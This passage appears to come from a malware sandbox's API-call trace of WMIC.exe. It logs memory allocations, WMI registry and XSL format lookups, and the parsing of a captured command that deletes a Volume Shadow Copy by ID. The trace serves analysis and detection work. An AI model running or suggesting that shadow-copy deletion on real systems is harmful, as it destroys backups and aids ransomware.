(_Size=0x30) returned 0x528040 [0106.924] malloc (_Size=0x40) returned 0x526e00 [0106.924] malloc (_Size=0x20a) returned 0x526e50 [0106.924] GetSystemDirectoryW (in: lpBuffer=0x526e50, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0106.924] free (_Block=0x526e50) [0106.924] malloc (_Size=0x18) returned 0x526e50 [0106.924] malloc (_Size=0x18) returned 0x526e70 [0106.924] malloc (_Size=0x18) returned 0x526e90 [0106.924] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0106.924] SysStringLen (param_1="\\wbem\\") returned 0x6 [0106.925] free (_Block=0x526e50) [0106.925] free (_Block=0x526e70) [0106.925] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0106.925] free (_Block=0x526e90) [0106.925] malloc (_Size=0x18) returned 0x526e50 [0106.925] malloc (_Size=0x18) returned 0x526e70 [0106.925] malloc (_Size=0x18) returned 0x526e90 [0106.925] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0106.925] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0106.925] free (_Block=0x526e50) [0106.925] free (_Block=0x526e70) [0106.925] GetCurrentThreadId () returned 0x788 [0106.925] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x16f440 | out: phkResult=0x16f440*=0xf8) returned 0x0 [0106.925] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x16f490, lpcbData=0x16f430*=0x400 | out: lpType=0x0, lpData=0x16f490*=0x30, lpcbData=0x16f430*=0x4) returned 0x0 [0106.925] _wcsicmp (_String1="0", _String2="1") returned -1 [0106.926] _wcsicmp (_String1="0", _String2="2") returned -2 [0106.926] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x16f430*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x16f430*=0x42) returned 0x0 [0106.926] malloc (_Size=0x86) returned 0x526eb0 [0106.926] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x526eb0, lpcbData=0x16f430*=0x42 | out: lpType=0x0, lpData=0x526eb0*=0x25, lpcbData=0x16f430*=0x42) returned 0x0 [0106.926] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0106.926] malloc (_Size=0x42) returned 0x526f40 [0106.926] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0106.926] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x16f490, lpcbData=0x16f430*=0x400 | out: lpType=0x0, lpData=0x16f490*=0x36, lpcbData=0x16f430*=0xc) returned 0x0 [0106.926] _wtol (_String="65536") returned 65536 [0106.926] free (_Block=0x526eb0) [0106.926] RegCloseKey (hKey=0x0) returned 0x6 [0106.926] CoCreateInstance (in: rclsid=0xff1e7410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff1e73f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x16f938 | out: ppv=0x16f938*=0x4a71d0) returned 0x0 [0106.945] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x4a71d0, xmlSource=0x16fa80*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x526e50), isSuccessful=0x16faf0 | out: isSuccessful=0x16faf0*=0xffff) returned 0x0 [0107.089] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x4a71d0, DOMElement=0x16f930 | out: DOMElement=0x16f930) returned 0x0 [0107.089] malloc (_Size=0x18) returned 0x526e50 [0107.089] free (_Block=0x526e50) [0107.089] malloc (_Size=0x18) returned 0x526e50 [0107.089] free (_Block=0x526e50) [0107.089] malloc (_Size=0x18) returned 0x526e50 [0107.090] malloc (_Size=0x18) returned 0x526e70 [0107.090] malloc (_Size=0x30) returned 0x528080 [0107.090] malloc (_Size=0x18) returned 0x526eb0 [0107.090] free (_Block=0x526eb0) [0107.090] malloc (_Size=0x18) returned 0x52c560 [0107.090] malloc (_Size=0x18) returned 0x52c580 [0107.090] SysStringLen (param_1="VALUE") returned 0x5 [0107.090] SysStringLen (param_1="TABLE") returned 0x5 [0107.090] SysStringLen (param_1="TABLE") returned 0x5 [0107.090] SysStringLen (param_1="VALUE") returned 0x5 [0107.090] malloc (_Size=0x30) returned 0x5280c0 [0107.091] malloc (_Size=0x18) returned 0x52c5a0 [0107.091] free (_Block=0x52c5a0) [0107.091] malloc (_Size=0x18) returned 0x52c5a0 [0107.091] malloc (_Size=0x18) returned 0x52c5c0 [0107.091] SysStringLen (param_1="LIST") returned 0x4 [0107.091] SysStringLen (param_1="TABLE") returned 0x5 [0107.091] malloc (_Size=0x30) returned 0x528100 [0107.091] malloc (_Size=0x18) returned 0x52c5e0 [0107.091] free (_Block=0x52c5e0) [0107.092] malloc (_Size=0x18) returned 0x52c5e0 [0107.092] malloc (_Size=0x18) returned 0x52c600 [0107.092] SysStringLen (param_1="RAWXML") returned 0x6 [0107.092] SysStringLen (param_1="TABLE") returned 0x5 [0107.092] SysStringLen (param_1="RAWXML") returned 0x6 [0107.092] SysStringLen (param_1="LIST") returned 0x4 [0107.092] SysStringLen (param_1="LIST") returned 0x4 [0107.092] SysStringLen (param_1="RAWXML") returned 0x6 [0107.092] malloc (_Size=0x30) returned 0x528140 [0107.092] malloc (_Size=0x18) returned 0x52c620 [0107.092] free (_Block=0x52c620) [0107.092] malloc (_Size=0x18) returned 0x52c620 [0107.092] malloc (_Size=0x18) returned 0x52c640 [0107.092] SysStringLen (param_1="HTABLE") returned 0x6 [0107.092] SysStringLen (param_1="TABLE") returned 0x5 [0107.092] SysStringLen (param_1="HTABLE") returned 0x6 [0107.093] SysStringLen (param_1="LIST") returned 0x4 [0107.093] malloc (_Size=0x30) returned 0x528180 [0107.093] malloc (_Size=0x18) returned 0x52c660 [0107.093] free (_Block=0x52c660) [0107.093] malloc (_Size=0x18) returned 0x52c660 [0107.093] malloc (_Size=0x18) returned 0x52c680 [0107.093] SysStringLen (param_1="HFORM") returned 0x5 [0107.093] SysStringLen (param_1="TABLE") returned 0x5 [0107.093] SysStringLen (param_1="HFORM") returned 0x5 [0107.093] SysStringLen (param_1="LIST") returned 0x4 [0107.093] SysStringLen (param_1="HFORM") returned 0x5 [0107.093] SysStringLen (param_1="HTABLE") returned 0x6 [0107.093] malloc (_Size=0x30) returned 0x5281c0 [0107.094] malloc (_Size=0x18) returned 0x52c6a0 [0107.094] free (_Block=0x52c6a0) [0107.094] malloc (_Size=0x18) returned 0x52c6a0 [0107.094] malloc (_Size=0x18) returned 0x52c6c0 [0107.094] SysStringLen (param_1="XML") returned 0x3 [0107.094] SysStringLen (param_1="TABLE") returned 0x5 [0107.094] SysStringLen (param_1="XML") returned 0x3 [0107.094] SysStringLen (param_1="VALUE") returned 0x5 [0107.094] SysStringLen (param_1="VALUE") returned 0x5 [0107.094] SysStringLen (param_1="XML") returned 0x3 [0107.094] malloc (_Size=0x30) returned 0x528200 [0107.094] malloc (_Size=0x18) returned 0x52c6e0 [0107.094] free (_Block=0x52c6e0) [0107.095] malloc (_Size=0x18) returned 0x52c6e0 [0107.095] malloc (_Size=0x18) returned 0x52c700 [0107.095] SysStringLen (param_1="MOF") returned 0x3 [0107.095] SysStringLen (param_1="TABLE") returned 0x5 [0107.095] SysStringLen (param_1="MOF") returned 0x3 [0107.095] SysStringLen (param_1="LIST") returned 0x4 [0107.095] SysStringLen (param_1="MOF") returned 0x3 [0107.095] SysStringLen (param_1="RAWXML") returned 0x6 [0107.095] SysStringLen (param_1="LIST") returned 0x4 [0107.095] SysStringLen (param_1="MOF") returned 0x3 [0107.095] malloc (_Size=0x30) returned 0x528240 [0107.095] malloc (_Size=0x18) returned 0x52c720 [0107.095] free (_Block=0x52c720) [0107.095] malloc (_Size=0x18) returned 0x52c720 [0107.095] malloc (_Size=0x18) returned 0x52c740 [0107.096] SysStringLen (param_1="CSV") returned 0x3 [0107.096] SysStringLen (param_1="TABLE") returned 0x5 [0107.096] SysStringLen (param_1="CSV") returned 0x3 [0107.096] SysStringLen (param_1="LIST") returned 0x4 [0107.096] SysStringLen (param_1="CSV") returned 0x3 [0107.096] SysStringLen (param_1="HTABLE") returned 0x6 [0107.096] SysStringLen (param_1="CSV") returned 0x3 [0107.096] SysStringLen (param_1="HFORM") returned 0x5 [0107.096] malloc (_Size=0x30) returned 0x528280 [0107.096] malloc (_Size=0x18) returned 0x52c760 [0107.096] free (_Block=0x52c760) [0107.096] malloc (_Size=0x18) returned 0x52c760 [0107.096] malloc (_Size=0x18) returned 0x52c780 [0107.096] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0107.096] SysStringLen (param_1="TABLE") returned 0x5 [0107.096] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0107.096] SysStringLen (param_1="VALUE") returned 0x5 [0107.096] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0107.096] SysStringLen (param_1="XML") returned 0x3 [0107.097] SysStringLen (param_1="XML") returned 0x3 [0107.097] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0107.097] malloc (_Size=0x30) returned 0x5282c0 [0107.097] malloc (_Size=0x18) returned 0x52c7a0 [0107.097] free (_Block=0x52c7a0) [0107.097] malloc (_Size=0x18) returned 0x52c7a0 [0107.097] malloc (_Size=0x18) returned 0x52c7c0 [0107.097] SysStringLen (param_1="texttablewsys") returned 0xd [0107.097] SysStringLen (param_1="TABLE") returned 0x5 [0107.097] SysStringLen (param_1="texttablewsys") returned 0xd [0107.097] SysStringLen (param_1="XML") returned 0x3 [0107.097] SysStringLen (param_1="texttablewsys") returned 0xd [0107.097] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0107.097] SysStringLen (param_1="XML") returned 0x3 [0107.097] SysStringLen (param_1="texttablewsys") returned 0xd [0107.097] malloc (_Size=0x30) returned 0x528300 [0107.098] malloc (_Size=0x18) returned 0x52c7e0 [0107.098] free (_Block=0x52c7e0) [0107.098] malloc (_Size=0x18) returned 0x52c7e0 [0107.098] malloc (_Size=0x18) returned 0x52c800 [0107.098] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0107.098] SysStringLen (param_1="TABLE") returned 0x5 [0107.098] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0107.098] SysStringLen (param_1="XML") returned 0x3 [0107.098] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0107.098] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0107.098] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0107.098] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0107.098] malloc (_Size=0x30) returned 0x528340 [0107.099] malloc (_Size=0x18) returned 0x52c820 [0107.099] free (_Block=0x52c820) [0107.099] malloc (_Size=0x18) returned 0x52c820 [0107.099] malloc (_Size=0x18) returned 0x52c840 [0107.099] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0107.099] SysStringLen (param_1="TABLE") returned 0x5 [0107.099] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0107.099] SysStringLen (param_1="XML") returned 0x3 [0107.099] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0107.099] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0107.099] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0107.099] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0107.099] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0107.099] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0107.099] malloc (_Size=0x30) returned 0x528380 [0107.099] malloc (_Size=0x18) returned 0x52c860 [0107.099] free (_Block=0x52c860) [0107.100] malloc (_Size=0x18) returned 0x52c860 [0107.100] malloc (_Size=0x18) returned 0x52c880 [0107.100] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0107.100] SysStringLen (param_1="TABLE") returned 0x5 [0107.100] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0107.100] SysStringLen (param_1="XML") returned 0x3 [0107.100] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0107.100] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0107.100] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0107.100] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0107.100] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0107.100] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0107.100] malloc (_Size=0x30) returned 0x5283c0 [0107.100] malloc (_Size=0x18) returned 0x52c8a0 [0107.100] free (_Block=0x52c8a0) [0107.101] malloc (_Size=0x18) returned 0x52c8a0 [0107.101] malloc (_Size=0x18) returned 0x52c8c0 [0107.101] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0107.101] SysStringLen (param_1="TABLE") returned 0x5 [0107.101] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0107.101] SysStringLen (param_1="XML") returned 0x3 [0107.101] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0107.101] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0107.101] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0107.101] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0107.101] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0107.101] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0107.101] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0107.101] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0107.101] malloc (_Size=0x30) returned 0x528400 [0107.101] malloc (_Size=0x18) returned 0x52c8e0 [0107.101] free (_Block=0x52c8e0) [0107.101] malloc (_Size=0x18) returned 0x52c8e0 [0107.102] malloc (_Size=0x18) returned 0x52c900 [0107.102] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0107.102] SysStringLen (param_1="TABLE") returned 0x5 [0107.102] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0107.102] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0107.102] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0107.102] SysStringLen (param_1="XML") returned 0x3 [0107.102] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0107.102] SysStringLen (param_1="texttablewsys") returned 0xd [0107.102] SysStringLen (param_1="XML") returned 0x3 [0107.102] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0107.102] malloc (_Size=0x30) returned 0x528440 [0107.102] malloc (_Size=0x18) returned 0x52c920 [0107.102] free (_Block=0x52c920) [0107.102] malloc (_Size=0x18) returned 0x52c920 [0107.102] malloc (_Size=0x18) returned 0x52c940 [0107.102] SysStringLen (param_1="htable-sortby") returned 0xd [0107.103] SysStringLen (param_1="TABLE") returned 0x5 [0107.103] SysStringLen (param_1="htable-sortby") returned 0xd [0107.103] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0107.103] SysStringLen (param_1="htable-sortby") returned 0xd [0107.103] SysStringLen (param_1="XML") returned 0x3 [0107.103] SysStringLen (param_1="htable-sortby") returned 0xd [0107.103] SysStringLen (param_1="texttablewsys") returned 0xd [0107.103] SysStringLen (param_1="htable-sortby") returned 0xd [0107.103] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0107.103] SysStringLen (param_1="XML") returned 0x3 [0107.103] SysStringLen (param_1="htable-sortby") returned 0xd [0107.103] malloc (_Size=0x30) returned 0x528480 [0107.103] malloc (_Size=0x18) returned 0x52c960 [0107.103] free (_Block=0x52c960) [0107.103] malloc (_Size=0x18) returned 0x52c960 [0107.103] malloc (_Size=0x18) returned 0x52c980 [0107.103] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0107.104] SysStringLen (param_1="TABLE") returned 0x5 [0107.104] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0107.104] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0107.104] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0107.104] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0107.104] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0107.104] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0107.104] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0107.104] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0107.104] malloc (_Size=0x30) returned 0x5284c0 [0107.104] malloc (_Size=0x18) returned 0x52c9a0 [0107.104] free (_Block=0x52c9a0) [0107.104] malloc (_Size=0x18) returned 0x52c9a0 [0107.104] malloc (_Size=0x18) returned 0x52c9c0 [0107.104] SysStringLen (param_1="wmiclimofformat") returned 0xf [0107.104] SysStringLen (param_1="TABLE") returned 0x5 [0107.104] SysStringLen (param_1="wmiclimofformat") returned 0xf [0107.104] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0107.105] SysStringLen (param_1="wmiclimofformat") returned 0xf [0107.105] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0107.105] SysStringLen (param_1="wmiclimofformat") returned 0xf [0107.105] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0107.105] SysStringLen (param_1="wmiclimofformat") returned 0xf [0107.105] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0107.105] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0107.105] SysStringLen (param_1="wmiclimofformat") returned 0xf [0107.105] malloc (_Size=0x30) returned 0x528500 [0107.105] malloc (_Size=0x18) returned 0x52c9e0 [0107.105] free (_Block=0x52c9e0) [0107.105] malloc (_Size=0x18) returned 0x52c9e0 [0107.105] malloc (_Size=0x18) returned 0x52ca00 [0107.105] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0107.105] SysStringLen (param_1="TABLE") returned 0x5 [0107.105] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0107.105] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0107.105] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0107.106] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0107.106] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0107.106] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0107.106] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0107.106] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0107.106] malloc (_Size=0x30) returned 0x528540 [0107.106] malloc (_Size=0x18) returned 0x52ca20 [0107.106] free (_Block=0x52ca20) [0107.106] malloc (_Size=0x18) returned 0x52ca20 [0107.106] malloc (_Size=0x18) returned 0x52ca40 [0107.106] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0107.106] SysStringLen (param_1="TABLE") returned 0x5 [0107.106] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0107.106] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0107.106] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0107.106] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0107.106] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0107.106] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0107.107] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0107.107] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0107.107] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0107.107] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0107.107] malloc (_Size=0x30) returned 0x528580 [0107.107] FreeThreadedDOMDocument:IUnknown:Release (This=0x4a71d0) returned 0x0 [0107.107] free (_Block=0x526e90) [0107.107] GetCommandLineW () returned="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}'\" delete" [0107.107] malloc (_Size=0xe0) returned 0x52cd30 [0107.107] memcpy_s (in: _Destination=0x52cd30, _DestinationSize=0xde, _Source=0x2425be, _SourceSize=0xd0 | out: _Destination=0x52cd30) returned 0x0 [0107.107] malloc (_Size=0x18) returned 0x52ca60 [0107.107] malloc (_Size=0x18) returned 0x52ca80 [0107.108] malloc (_Size=0x18) returned 0x52caa0 [0107.108] malloc (_Size=0x18) returned 0x52cac0 [0107.108] malloc (_Size=0x80) returned 0x526e90 [0107.108] GetLocalTime (in: lpSystemTime=0x16fad0 | out: lpSystemTime=0x16fad0*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x5, wDay=0x4, wHour=0x8, wMinute=0x37, wSecond=0xb, wMilliseconds=0x27f)) [0107.108] _vsnwprintf (in: _Buffer=0x526e90, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x16fa28 | out: _Buffer="09-04-2020T08:55:11") returned 19 [0107.108] lstrlenW (lpString=" shadowcopy where \"ID='{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}'\" delete") returned 71 [0107.108] malloc (_Size=0x90) returned 0x5270a0 [0107.108] lstrlenW (lpString=" shadowcopy where \"ID='{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}'\" delete") returned 71 [0107.108] lstrlenW (lpString=" shadowcopy where \"ID='{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}'\" delete") returned 71 [0107.108] malloc (_Size=0x90) returned 0x52ce20 [0107.108] lstrlenW (lpString=" shadowcopy where \"ID='{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}'\" delete") returned 71 [0107.108] lstrlenW (lpString=" shadowcopy where \"ID='{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}'\" delete") returned 71 [0107.108] lstrlenW (lpString=" shadowcopy where \"ID='{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}'\" delete") returned 71 [0107.108] malloc (_Size=0x16) returned 0x52cae0 [0107.108] lstrlenW (lpString="shadowcopy") returned 10 [0107.108] _wcsicmp (_String1="shadowcopy", _String2="\"NULL\"") returned 81 [0107.108] malloc (_Size=0x16) returned 0x52cb00 [0107.108] malloc (_Size=0x8) returned 0x527140 [0107.108] free (_Block=0x0) [0107.108] free (_Block=0x52cae0) [0107.108] lstrlenW (lpString=" shadowcopy where \"ID='{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}'\" delete") returned 71 [0107.108] malloc (_Size=0xc) returned 0x52cae0 [0107.108] lstrlenW (lpString="where") returned 5 [0107.108] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0107.108] malloc (_Size=0xc) returned 0x52cb20 [0107.109] malloc (_Size=0x10) returned 0x52cb40 [0107.109] memmove_s (in: _Destination=0x52cb40, _DestinationSize=0x8, _Source=0x527140, _SourceSize=0x8 | out: _Destination=0x52cb40) returned 0x0 [0107.109] free (_Block=0x527140) [0107.109] free (_Block=0x0) [0107.109] free (_Block=0x52cae0) [0107.109] lstrlenW (lpString=" shadowcopy where \"ID='{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}'\" delete") returned 71 [0107.109] malloc (_Size=0x5c) returned 0x52cec0 [0107.109] lstrlenW (lpString="\"ID='{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}'\"") returned 45 [0107.109] _wcsicmp (_String1="\"ID='{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}'\"", _String2="\"NULL\"") returned -5 [0107.109] lstrlenW (lpString="\"ID='{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}'\"") returned 45 [0107.109] lstrlenW (lpString="\"ID='{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}'\"") returned 45 [0107.109] malloc (_Size=0x5c) returned 0x52cf30 [0107.109] malloc (_Size=0x18) returned 0x52cae0 [0107.109] memmove_s (in: _Destination=0x52cae0, _DestinationSize=0x10, _Source=0x52cb40, _SourceSize=0x10 | out: _Destination=0x52cae0) returned 0x0 [0107.109] free (_Block=0x52cb40) [0107.109] free (_Block=0x0) [0107.109] free (_Block=0x52cec0) [0107.109] lstrlenW (lpString=" shadowcopy where \"ID='{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}'\" delete") returned 71 [0107.109] malloc (_Size=0xe) returned 0x52cb40 [0107.109] lstrlenW (lpString="delete") returned 6 [0107.109] _wcsicmp (_String1="delete", _String2="\"NULL\"") returned 66 [0107.109] malloc (_Size=0xe) returned 0x52cb60 [0107.109] malloc (_Size=0x20) returned 0x52cec0 [0107.109] memmove_s (in: _Destination=0x52cec0, _DestinationSize=0x18, _Source=0x52cae0, _SourceSize=0x18 | out: _Destination=0x52cec0) returned 0x0 [0107.109] free (_Block=0x52cae0) [0107.109] free (_Block=0x0) [0107.111] free (_Block=0x52cb40) [0107.111] malloc (_Size=0x20) returned 0x52cef0 [0107.111] lstrlenW (lpString="QUIT") returned 4 [0107.111] lstrlenW (lpString="shadowcopy") returned 10 [0107.111] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0107.111] lstrlenW (lpString="EXIT") returned 4 [0107.111] lstrlenW (lpString="shadowcopy") returned 10 [0107.111] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0107.111] free (_Block=0x52cef0) [0107.111] WbemLocator:IUnknown:AddRef (This=0x1f51390) returned 0x2 [0107.111] malloc (_Size=0x20) returned 0x52cef0 [0107.112] lstrlenW (lpString="/") returned 1 [0107.112] lstrlenW (lpString="shadowcopy") returned 10 [0107.112] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0107.112] lstrlenW (lpString="-") returned 1 [0107.112] lstrlenW (lpString="shadowcopy") returned 10 [0107.112] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0107.112] lstrlenW (lpString="CLASS") returned 5 [0107.112] lstrlenW (lpString="shadowcopy") returned 10 [0107.112] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0107.112] lstrlenW (lpString="PATH") returned 4 [0107.112] lstrlenW (lpString="shadowcopy") returned 10 [0107.112] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0107.112] lstrlenW (lpString="CONTEXT") returned 7 [0107.112] lstrlenW (lpString="shadowcopy") returned 10 [0107.112] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0107.112] lstrlenW (lpString="shadowcopy") returned 10 [0107.112] malloc (_Size=0x16) returned 0x52cb40 [0107.112] lstrlenW (lpString="shadowcopy") returned 10 [0107.112] GetCurrentThreadId () returned 0x788 [0107.112] ??0CHString@@QEAA@XZ () returned 0x16f8e0 [0107.112] malloc (_Size=0x18) returned 0x52cae0 [0107.112] malloc (_Size=0x18) returned 0x52cb80 [0107.113] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1f51390, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff252998 | out: ppNamespace=0xff252998*=0x1f63a98) returned 0x0 [0107.150] free (_Block=0x52cb80) [0107.150] free (_Block=0x52cae0) [0107.150] CoSetProxyBlanket (pProxy=0x1f63a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0107.151] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0107.151] GetCurrentThreadId () returned 0x788 [0107.151] ??0CHString@@QEAA@XZ () returned 0x16f778 [0107.151] malloc (_Size=0x18) returned 0x52cae0 [0107.151] malloc (_Size=0x18) returned 0x52cb80 [0107.151] malloc (_Size=0x18) returned 0x52cba0 [0107.151] malloc (_Size=0x18) returned 0x52cbc0 [0107.151] SysStringLen (param_1="root\\cli") returned 0x8 [0107.151] SysStringLen (param_1="\\") returned 0x1 [0107.151] malloc (_Size=0x18) returned 0x52cbe0 [0107.151] SysStringLen (param_1="root\\cli\\") returned 0x9 [0107.151] SysStringLen (param_1="ms_409") returned 0x6 [0107.151] free (_Block=0x52cbc0) [0107.152] free (_Block=0x52cba0) [0107.152] free (_Block=0x52cb80) [0107.152] free (_Block=0x52cae0) [0107.152] malloc (_Size=0x18) returned 0x52cae0 [0107.152] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1f51390, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", 